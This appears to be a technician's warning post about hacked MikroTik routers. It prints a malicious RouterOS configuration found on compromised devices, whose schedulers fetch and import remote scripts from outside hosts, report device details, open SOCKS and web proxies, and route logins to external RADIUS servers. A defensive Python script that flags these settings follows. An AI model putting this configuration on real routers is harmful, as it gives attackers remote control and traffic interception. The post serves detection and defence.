Previous posts:
Mikrotik: Hajime Botnet attack on MikroTik devices worldwide
Mikrotik: September 2018 outbreak
Mikrotik: October 2018 outbreak
An update with yet another newly found hacked script,…
/system scheduler
add interval=1h name=updateSZJS on-event=":do {/tool fetch url=\"http://meag\
    han.pythonanywhere.com/\" dst-path=tmp} on-error={:put \"get http error\"}\
    ;\r\
    \n/import tmp;\r\
    \n/file remove tmp;" policy=\
    ftp,reboot,read,write,policy,test,password,sniff,sensitive start-date=\
    mar/31/2018 start-time=20:21:00
/system script
add name=script4_ owner=xxx policy=\
    ftp,reboot,read,write,policy,test,password,sensitive source="/tool fetch a\
    ddress=95.154.216.168 port=2008 src-path=/mikrotik.php mode=http keep-resu\
    lt=no"
/ip dns
set allow-remote-requests=yes servers="94.247.43.254,1\
    07.172.42.186,128.52.130.209,163.53.248.170,185.208.208.141"
/ip firewall nat
add action=redirect chain=dstnat comment=sysadminpxy dst-port=80 protocol=tcp \
    src-address-list=!Ok to-ports=8080
/ip proxy
set cache-path=web-proxy1 enabled=yes
/ip service
set telnet disabled=yes
set ftp disabled=yes
set ssh disabled=yes
set api disabled=yes
set winbox disabled=yes port=40527
set api-ssl disabled=yes
/ip socks
set enabled=yes port=30526
/ppp aaa
set use-radius=yes
/radius
add address=45.79.109.133 secret=test service=ppp,login,dhcp
add address=139.162.71.145 secret=test service=ppp,login,dhcp
add address=128.199.172.32 secret=test service=ppp,login,dhcp
add address=178.128.214.44 secret=test service=ppp,login,dhcp
/radius incoming
set accept=yes port=1700
/user aaa
set default-group=full use-radius=yes
/system scheduler
add interval=10m name="DDNS Serv" on-event="/system script run iDDNS" policy=\
    ftp,reboot,read,write,policy,test,password,sniff,sensitive start-time=\
    startup
add interval=20m name="DDNS Backup" on-event=":global mac [/interface ethernet\
    \_get 0 mac-address]\r\
    \n:global port ([/ip service get winbox port].\"_\".[/ip socks get port].\
    \"_\".[/ip proxy get port])\r\
    \n:global info ([/ip socks get enabled].\"_\".[/ip proxy get enabled])\r\
    \n:global cmd \"/\$mac/\$port/\$info/dns\"\r\
    \n:do {/tool fetch address=azdns.ru src-path=\$cmd mode=http dst-path=dns}\
    \_on-error={/tool fetch address=src.click src-path=\$cmd mode=http dst-pat\
    h=dns}\r\
    \n:delay 3s;/import dns;:delay 4s;/file remove dns" policy=\
    ftp,reboot,read,write,policy,test,password,sniff,sensitive start-time=\
    startup
add interval=1d name="DDNS reLoad" on-event=":do {/tool fetch url=http://src.c\
    lick/error.html mode=http dst-path=flash/webproxy/error.html;/tool fetch u\
    rl=http://src.click/error.html mode=http dst-path=webproxy/error.html} on-\
    error={/tool fetch url=http://priv.su/error.html mode=http dst-path=flash/\
    webproxy/error.html;/tool fetch url=http://priv.su/error.html mode=http ds\
    t-path=webproxy/error.html}" policy=\
    ftp,reboot,read,write,policy,test,password,sniff,sensitive start-time=\
    startup
/system script
add name=iDDNS owner=adminuser policy=\
    ftp,reboot,read,write,policy,test,password,sniff,sensitive source=":global\
    \_mac [/interface ethernet get 0 mac-address]\r\
    \n:global port ([/ip service get winbox port].\"_\".[/ip socks get port].\
    \"_\".[/ip proxy get port])\r\
    \n:global info ([/ip socks get enabled].\"_\".[/ip proxy get enabled])\r\
    \n:global cmd \"/\$mac/\$port/\$info/dns\"\r\
    \n:do {/tool fetch address=src-ip.com src-path=\$cmd mode=http dst-path=dn\
    s} on-error={/tool fetch address=src.click src-path=\$cmd mode=http dst-pa\
    th=dns}\r\
    \n:delay 3s;/import dns;:delay 4s;/file remove dns"
Sooo, don't forget to check the rest of your config as well.
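An added example, not from the original post: a Python audit that reads a RouterOS `/export` and flags the kinds of changes seen in the dump above (fetch-and-import schedulers, SOCKS and web proxy switched on, open DNS, RADIUS-backed logins). The sample export, its host name and its addresses are constructed placeholders, and a hit marks a setting to review, not proof of compromise.

```python
import re

# Constructed sample in RouterOS /export layout (placeholder values, not from the post).
SAMPLE_EXPORT = r'''/system scheduler
add interval=1h name=upd on-event=":do {/tool fetch url=\"http://exam\
    ple.invalid/\" dst-path=tmp} on-error={}\r\
    \n/import tmp;\r\
    \n/file remove tmp;" policy=read,write
/ip socks
set enabled=yes port=30526
/ip dns
set allow-remote-requests=yes servers=192.0.2.53
/user aaa
set default-group=full use-radius=yes
/ip service
set ssh disabled=yes
'''

# (export section, pattern matched against each add/set line, finding text)
RULES = [
    ("/system scheduler", r"/tool fetch.*/import", "scheduler fetches and imports a remote script"),
    ("/system script", r"/tool fetch", "stored script downloads from a remote host"),
    ("/ip socks", r"\benabled=yes", "SOCKS proxy enabled"),
    ("/ip proxy", r"\benabled=yes", "web proxy enabled"),
    ("/ip firewall nat", r"action=redirect.*to-ports=8080", "HTTP redirected into web proxy"),
    ("/ip dns", r"allow-remote-requests=yes", "router answers remote DNS requests"),
    ("/radius", r"^add ", "RADIUS server entry present"),
    ("/user aaa", r"use-radius=yes", "router logins authenticated via RADIUS"),
]

def join_continuations(text):
    """Undo export line wrapping: a trailing backslash continues on the next line."""
    return re.sub(r"\\\r?\n[ \t]*", "", text)

def audit(export_text):
    findings, section = [], None
    for line in join_continuations(export_text).splitlines():
        line = line.strip()
        if line.startswith("/"):      # section header such as "/ip socks"
            section = line
            continue
        for sec, pattern, message in RULES:
            if section == sec and re.search(pattern, line):
                findings.append((sec, message))
    return findings

if __name__ == "__main__":
    for sec, message in audit(SAMPLE_EXPORT):
        print(f"{sec}: {message}")
```

Run it against a saved export from your own router and compare every hit with what you configured yourself.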
Regards, fellow technicians
__________________________________
Link to the author's technical profile
email : ariyaandro@gmail.com

